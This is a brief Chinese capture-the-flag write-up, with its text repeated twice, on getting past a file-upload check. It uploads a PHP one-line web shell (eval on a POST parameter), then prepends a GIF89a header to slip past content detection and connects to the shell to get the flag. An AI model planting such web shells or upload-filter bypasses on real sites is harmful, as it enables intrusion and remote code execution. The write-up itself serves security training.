文件头绕过上传
思路
网页有上传文件的入口,先尝试上传一个一句话木马
eval($_POST['cssec']); |
网页提示
服务器检测到<?php,启动了查杀程序。 |
可能是对文件头或者文件内容的检验,修改一句话木马为
GIF89a |
添加gif的文件头,不会影响php的解析
连接木马,得到flag
网页有上传文件的入口,先尝试上传一个一句话木马
eval($_POST['cssec']); |
网页提示
服务器检测到<?php,启动了查杀程序。 |
可能是对文件头或者文件内容的检验,修改一句话木马为
GIF89a |
添加gif的文件头,不会影响php的解析
连接木马,得到flag